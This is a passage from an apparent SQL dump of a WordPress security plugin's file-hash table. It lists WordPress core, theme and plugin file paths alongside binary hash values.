+\'8k_','',0,'?'),('��s��,��j�j3','wp-content/plugins/wp-cerber/assets/flags/gg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��L\Z��|�=�c��','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0�����ou��̌�','����7/Q���ƐՐw�g:�?��#{s��ɟ�','',0,'?'),('��dA#���*�Źo7','wp-admin/js/customize-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�$�����a�F','{��f[�����;�\"�h�]]u��3	�_�oQ�\Zu','',0,'?'),('�3=^��7�P�RA','wp-content/plugins/wp-cerber/assets/flags/sr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NT��I`$�x�\"v','�J!�^�α}���ݓ$�R�M~i���c���P','',0,'?'),('��D��a����d�','wp-content/themes/magazine-hoot/js/modernizr.custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I~�i/\r�w:R�','Oa�$A�\Z\"��9b����a?�۷��\n=\\3�N�','',0,'?'),('��V\ZF��\0���|�','wp-includes/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('���x�OW\r�����','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ئT�Ь�Ԅc�/��','TJ�)�,8�q�@�f�<Dڛ��\rx����F�','',0,'?'),('�5ڜ���2�l2{�','wp-admin/js/widgets/media-video-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�ܥ��d|Q�S�n�','��R;T��wh��m^�����䜺��K�L�A','',0,'?'),('�D��!VD+����','wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�V���	�9�J�','փ��hbf��#��Ђ��OE��R���9H\r','',0,'?'),('�M�/<�P�ߍ�f.��','wp-includes/js/jquery/ui/effect-bounce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;B� ��GYQ�n�ߴ','���m/�g|ڶ\\���e(�>6��\n�-G!�\0','',0,'?'),('�T�:\Z����rD�� ','wp-content/themes/twentynineteen/readme.txt',0,'dp�bӧ��g�Z�l�u','dp�bӧ��g�Z�l�u','�D/��(V�sc�q\"c!���nX�@�����$','',0,'?'),('�VT��2e�w�gߋu8','wp-includes/js/jquery/ui/button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��.��ȴ�fh~O','Û�.�k(5S�1��!����>�^I t�ȭ���.','',0,'?'),('�W𓃚�F��GjU�Z','wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\n��+5�����4�','\\Λ;3X]��3��{{8�ҒZ\0�>��\\�&�','',0,'?'),('�z�6��+���PH\r�tU','wp-includes/css/dist/block-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p>F��ő~���K��','fm��e)����$�4�_%��8�R��L��','',0,'?'),('���˥̰MVЗe�A�','wp-admin/js/widgets/media-video-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3S��-!@|��[�M','���s�n�����U������Bo3�}��+�+','',0,'?'),('���t��(�iltY/','wp-includes/css/dist/list-reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����(����6�','��b1O�������:�DDHR�cj�ѐ�P�\r','',0,'?'),('��Τe;y�[��9�9','wp-includes/js/jquery/ui/checkboxradio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"VSdF\n��k���:','$Lq���\'��i�>WuY\\���{�k���\r�{','',0,'?'),('��\nL0Qod`�\\�;�','wp-content/plugins/wp-cerber/assets/icons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T4�s�bRߺ0�','v	�QNԯ�L�|̗E��,@���8By�:Y��','',0,'?'),('��3\"�(z�a�4�8�','wp-includes/images/media/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('�̍z�ckn���COS�','wp-content/themes/magazine-hoot/include/admin/images/premium-carousels.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+\\�6d�hY����','Φ�t��(vR�媟�]�Ȏ�=b7���','',0,'?'),('�\n�\"Y|�v���oE��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2I�li��g���R�w','D�V����]�\\�P���f�y�K�u�a�m��','',0,'?'),('�~Q�ԁŴFp���','wp-includes/class-wp-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kx�om���u�5t�','��8TI�|�|C�!��`vg�#�Q!ɓ{=��','',0,'?'),('�]U�W��I�͢-','wp-content/themes/magazine-hoot/include/admin/images/archive-mosaic1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d���w�T��sF2','�R�o�8Q�@����*1O�w��N���\n�','',0,'?'),('�2|�MJ�/�͆�^�}','wp-content/plugins/wp-cerber/assets/flags/ao.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\'��cu��fq�','�9&��[��؊�|�&���ʘ�����<��HR','',0,'?'),('�kHm�1��`0ѹ��_','wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2����sg�5�䃥l','�?*��\0Z:WX̩�k�k\0IM��UT','',0,'?'),('�zݿ�&X❙6���s','wp-admin/css/media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E^?���7��v�+�z=','A�l:d�72[�X1R�w�#��ؤ�p��h5�6X','',0,'?'),('��!��y��F��]���','wp-admin/includes/class-wp-ajax-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&L�g=�%cn�	}ǣ�','(��`���ĺ�E�ϙ)#��I�jHߠ�&�{','',0,'?'),('����\n ����(z','wp-includes/PHPMailer/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ߡ�M(���','��A+�n7�51�K���i��|Y��m','',0,'?'),('�����z(�d�\'dIt�\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��4?ŽN��Pɴ�_�','ȏ�DEDL]R���d��4�\"�$ A�vǓ�','',0,'?'),('�ˢ��\n��\'jN\"�','wp-admin/css/.bt',0,'�*�_����\\�+-T','�*�_����\\�+-T','f�*�Bo_:�g�x�I��r!mK\07���E','',0,'?'),('�ٵ\nh��Jx�dv�ԃ]','wp-content/plugins/wordfence/lib/wf503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�ݥ��!��YG�w','!�r�|�n�M�-��Yn6X�p����ʖ','',0,'?'),('�$��Ld�N�B��1','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0;�A�\\\\E�gC�^\\','�P��ˡr�#��bhI.�;��ٵ7�\'콀N','',0,'?'),('��^|J�ʕ\Z%��\"b�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i^e�]�M���@','�~\nf)��Z�����?\"z�I�\\�N乍��','',0,'?'),('��$�T�X�@#��A��','wp-admin/js/widgets/text-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�#)��i�M��}����','\n��^uӟf~LE5A�\0��r23�q6BSk���','',0,'?'),('���2zs�4x�EB','wp-includes/ID3/module.tag.id3v1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IU��.Q�c�g���','�C��BH�9��D�y�;-�K�:LAx�?8\\~�	��','',0,'?'),('�_r#�Eȯ�̪%','wp-content/plugins/wp-cerber/assets/flags/ne.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�`R��$�`}L��\0\"�','h�~w=+^��Q#Wt/��	w�~�j���+','',0,'?'),('�Obc��\" ���|J(','wp-includes/images/smilies/icon_evil.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('�$�\0C�j@���Q�','wp-content/themes/magazine-hoot/hybrid/js/customize-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��NBҁ���o�','ƿ���	��X���dZ\n���V�r����7��X','',0,'?'),('�1��WV(2��6����','wp-admin/images/icons32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۬[�m9��J�4�\Z�','D�kC�d��i|a|�����+�\r�x��̌��','',0,'?'),('�5�u�uȸ��8�P�Һ','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���܊:����嵷Y','&��yZ��e��n��_���&���0�A �5','',0,'?'),('�6��M͓��)̻','wp-includes/blocks/text-columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�ȴ����Y͆ ','�A��-�תe���`�)�\'WS>KXIZ��','',0,'?'),('�=���}�LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�—\nXj�\'�;q�{��a�','',0,'?'),('�O�tg�\02�\\�B��','wp-includes/assets/script-loader-packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�K��a�e�kb\r�5','�^h&޺^I��nb�ކ�n:*jB�_��3�V+n�','',0,'?'),('�Ym�R�l�X\0���:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�II�ٹ�$V��;�','p�K�-�׈�.,�ZT�!��:-[�������','',0,'?'),('�]숊YT��Xm�+%','wp-includes/js/dist/vendor/moment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\"��\"M��aM�w�M','O��m��y���6ۆ�x`R0Nh[7\0]�%�ʞ','',0,'?'),('�j��U�U�X\Z��/J/','wp-admin/includes/class-core-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�����	X�9\"QB','Hg�-�9������O�2G����f�#�B���S','',0,'?'),('‚k?D1IR�!��+�$','wp-content/themes/magazine-hoot/include/admin/widget-social-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K���^���.�-a��','N`#�~j0KE3�ŤI���ɬ�I�¥�VqA','',0,'?'),('Š�gزh/Ḯ�O�N','wp-includes/class-wp-block-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<Aj�Q�~$���~��','��\\)�dw(?o���1�i�n�@�~KU6���Z','',0,'?'),('ždC�]ipuÒ�u�','wp-content/themes/magazine-hoot/include/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D1x�V�\'pQh�','2�	{/�\Z3�l;#\0���,łaͩY��\nC2W�','',0,'?'),('�1���|�}���dQ','wp-admin/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�\"�\r\r�','x��=��|ˋ{�lbn��;��Ep���r�?','',0,'?'),('��쯠zB����\0��','wp-content/themes/magazine-hoot/template-parts/slider-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��r�B�[.�`�','֝�v?!\Z��z�h��b�����=��8�����','',0,'?'),('�	1��А々�S:(','wp-includes/js/thickbox/loadingAnimation.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('�w:k@D�i�WQ�','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oI�Ʒk���b','7.ݰ̿���U���L>�\"�TM5�]��>�','',0,'?'),('���\Z�V���տ','wp-content/plugins/wp-cerber/cerber-maintenance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�69SH\nƻ��/��(�','�(c%��vW�S�xEuς><���¶�Ȯ[� ','',0,'?'),('�@N��s\"*ԃ;��','wp-content/themes/magazine-hoot/include/admin/images/slider-type-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.kqکE���_&T�','o!���d��0�G��9�_����_H�d�)�|OV','',0,'?'),('�T���!ة7�l��<','wp-includes/js/codemirror/htmlhint-kses.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('�_���jSX�2�QQ=','wp-includes/ms-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?'),('�`~|D%EH�wO����','wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�]-�@W�\\0��Wv','�c`�C(ߛ�V�S6ب�c�s�u8�6��l','',0,'?'),('ÂuJ�M�/� w�y','wp-includes/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XP�sHG�/n�w','�-ܙ���_�P^�C����`ֵ�.���F�If','',0,'?'),('ä��]0�`���AS:D','wp-includes/js/dist/blob.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eLi���7�Mq\nk��','ZF�}��bgHCk��]��`�E|k�nW�','',0,'?'),('ý��P��7&ݣ`�)','wp-includes/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uw�h[e��z�x��','wp�B��3K�r3_�!�}��b����d�v\r��','',0,'?'),('��tnR�ؔ����%^�','wp-admin/images/align-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���Oe#�l@:P+\"v','�ɳ���C��?�=���&��UyZ�31��!<c','',0,'?'),('���5�V\"�$$�_��','wp-admin/includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=b��)�z��(��','��\\���.�[-�C��-�E>B᧶9�����','',0,'?'),('��4�l!�r��؄���','wp-includes/class-wp-block-type-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rR�M8��u<�V�l��','�\Z�7�Q\0����O�C�\r.�D�\0n*���','',0,'?'),('��e��fz���eox��','wp-content/themes/twentytwentyone/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\"qѹ��sԬ','�J��3��mZ��2:��d�\\�6_�Շ�c*4','',0,'?'),('��iY����\0\nR)��','wp-includes/post-thumbnail-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��V��cꘄ','G�%*�J	���$��o=�@��k����Jl�','',0,'?'),('��u�X�ݼ#�-���','wp-includes/class-wp-http-ixr-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����2���5K','�BVrAC\n�a�+���(�;%�FdC��TD�#��','',0,'?'),('�ň��/���tNҊb','wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����3,B�V���','��ڑ�t4U��\"�;�t�7�\Z�Jy�rb@','',0,'?'),('�&)����N~&����','wp-content/themes/twentytwentyone/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����ّ^R�	','\Z��u�@�\'\\��KL�82�B��r�\Z2HC�o','',0,'?'),('�*�,�G:\"b@��*�','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���k2��=��#�V','��FT������6�c��K�t#-��§�����','',0,'?'),('�`�,}��D��@','wp-includes/class-wp-recovery-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oxц��<N��','�4>���\r�	j����s�dqm��H��l�7�~��','',0,'?'),('Ĉ^A��+l���o�d��','wp-includes/js/tinymce/skins/wordpress/images/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('ĔԼ���pP�Z	H��','wp-includes/images/smilies/icon_cry.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('Ħ��SNL��h`���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"mb�\'u�̩��D�','9Z�Jn�l+;�CG;	�+�0s����f�8�','',0,'?'),('ijJ�\n`|�5,HT��','wp-admin/includes/admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��1T�(Nȩ\Z','�7��NZ|�0�N��HQ��r�\nR��o�C�f','',0,'?'),('Ķ�Ɩ�o���èf{U','wp-includes/js/jquery/ui/effect-highlight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('�Ѻɩ��uy����}','wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('��ʙ\0}��甠K��.�','wp-includes/js/jquery/jquery.color.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('��{A��mm��*�K','wp-includes/nav-menu-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JI1E%g䅝�?�&�','AS%�³�[�|ZJf�RH3#Bl�K��zH','',0,'?'),('�D���C����F}��','wp-includes/Requests/Exception/HTTP/418.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J!�����[��4��','4 �6鎬��M&�$!�2d<��\\	|\\�?g�\n','',0,'?'),('�V݀^�W�4��-zX','wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fq�ag�D���i\"','-u��|�5��CD`��磩QrG��)&�','',0,'?'),('�_�n�����p���aV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L�1�˵�\"k%F�+','Z��i�M�f�U�v�i-�})��f�\"��Mnd?X','',0,'?'),('�`#��G�b�C��֊�','wp-includes/js/swfupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��ڙK�~q	����c=','�T򌿑�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('łj�Dߋ�.�˖D��','wp-admin/css/forms.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3B2�&*)��^*��3','�ĤѮp\\��;x�\'���H�42�N��_�Ei','',0,'?'),('Ŋ��6���@�L(`��','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �W�	r��>�Vݟ�','p�<L�>�������\r�~29~�^��ɋF�','',0,'?'),('że�����E@}-�','wp-content/plugins/wp-cerber/assets/flags/ss.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��-�p�lE���k�/�','wp-includes/js/jquery/jquery.hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9  +V�k�','',0,'?'),('�΂v�0�r�m����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�UŽ�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e�	�','',0,'?'),('���$e���n��fH�\"','wp-content/themes/magazine-hoot/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a-&y�K���_\\��n','�ѸO�F]���+Y�•w����u�ָ��q�Ļ','',0,'?'),('��A#����Uu�O���','wp-content/plugins/wp-cerber/assets/flags/sk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�q!-�\"�jU]P','��!$�2�E@��e�K���z\\�x�<GF�	','',0,'?'),('�v�T!)��aH�','wp-content/plugins/wp-cerber/assets/flags/mq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zs�׳Wh���','����J���U2V\\��h�Ѧ�Z�t/���Q','',0,'?'),('�ZTD�\r�[��FcLL�','wp-includes/blocks/gallery/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������9��Qv��','��PgcZn1q��b�-޼���x�]ME��ܻ���','',0,'?'),('�	��#A�\n#b#��=','wp-includes/js/tinymce/themes/inlite/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('��p�1	�?��J@�','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǧn3Q�2�G�','�d��\"fݎ���6em�`�z����P<KO�','',0,'?'),('�+���g���q6�^\0�','wp-admin/images/wheel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0� q0m��\ZY%V�X�','(]�:=d�qۅ�O{9�€Ԁ�v��Ș~����','',0,'?'),('�@��:<�o|J-e�','wp-content/plugins/wordfence/images/wf-error-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EQt��s	�Mz�y���','��殙F��`�a�݀�k���mE�Q��+~��','',0,'?'),('�M�y�\Z���$�.','wp-content/themes/magazine-hoot/hybrid/extend/customize/control-radio-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��c.TP<5�l����','6���<8D�*>l񡵽�D���ן�=�\\��=b�','',0,'?'),('�f�\n-��@��|�~�\\','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/7.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o$/�K]l�u�r�r&�','-��\0�ъ�yF���i���=:��`����]�','',0,'?'),('�m2`3�?�\\u��8��','wp-content/themes/magazine-hoot/template-parts/loop-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�]D���4�#%�͑','އu��q��;�%�E@\\<�>�lXz��	r\'','',0,'?'),('ƅ����|_�i/y��	','wp-includes/js/tinymce/plugins/media/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('Ƭ+\Z���I�d^i <\0','wp-includes/js/jquery/suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('Ƭ��SX���Z���3�','wp-includes/js/dist/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OBb�?�Ɖ�х��','�[��ɉ��NN�^p��D_S��r�pI~8,�v','',0,'?'),('�Ցf�)cW)֗�Og�','wp-content/themes/twentytwentyone/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��5�%�$���','}�C!�Mk;\'�?]�]��VW��A�e�Bߊ�','',0,'?'),('���yw�-p��`�)','wp-content/plugins/wp-cerber/assets/flags/cd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��E�\0{+k�`֚o','bf&<�9�\nTĔ��n��\Z~�\Z,����!��','',0,'?'),('�몳@� �=��y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�0�\"����#�','��֩y\n�	��ij����X�H�-<f	��c�','',0,'?'),('�͌%+�e�@uQ(�','wp-includes/js/dist/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ũ8��6uj(X4ѨÎ�','������U:W�{\n�b)SN��.=}c�A','',0,'?'),('�k8Q?<׊��y�p�','wp-content/plugins/akismet/views/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�CN3|)-�2Na���','���t�Cz� ����n�`j\r�M��N\"Ag���','',0,'?'),('�=�m����^D6W�','wp-content/themes/twentynineteen/sass/modules/_clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vY��P\\;���4�','�s���3s=���#q���˞< �I\'r&�','',0,'?'),('�FU�G��Хd�c��NC','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Al͟��\ZԀ�c��','�x�����(��Sn��\n;�y{%�_�j���/','',0,'?'),('ǂ-i)�.�\\���z�^a','wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('Dž�9��9:���\Z�','wp-includes/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��V��O��yDv� !','{�d���<>wb�S�q����B������','',0,'?'),('dž_5�2�߱�c�ƫ','wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�vm_��I��\\����','\r��鋕��1(���p�KH�KBY����eB','',0,'?'),('ǝ�^�x�JB\Z�3-�6','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('Ǥ>z�Ԅ��!J]>','wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('ǫ�=��m�/���^','wp-admin/includes/schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PI ��k�����	','&�v��x¡�gu�SV���ҏ����r�','',0,'?'),('ǭj�߃�;4��*','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�`�p.�Zb �x3I','#O)r�a�%�����r�2tK�P��1��kw��','',0,'?'),('dz\\��_L-Y�Ō%$','wp-includes/ID3/module.audio.dts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('Ǽ=���/%�@6�Dn','wp-content/themes/twentynineteen/sass/modules/_alignments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��\\�sӳR��]iO','̰簃b���p4�i��шB6����A���','',0,'?'),('��w��y�*�X�O\nG��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Vl~�m[%Wt','P�q\0������V{|�0m\0;���2�f@U�','',0,'?'),('��}�C�wX�TC��','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('��w.�(S�*I�e','wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nB���j����',')���i�o�[G\ZC�)E�ϳl�\r�h�d�!','',0,'?'),('�\Z{g�?�3gڢ\Z�','wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�*�����g����','�#!$��@�0g�.�;i3%!�cHP���=','',0,'?'),('��fp��\0!�tDK','wp-admin/js/code-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�\'߽	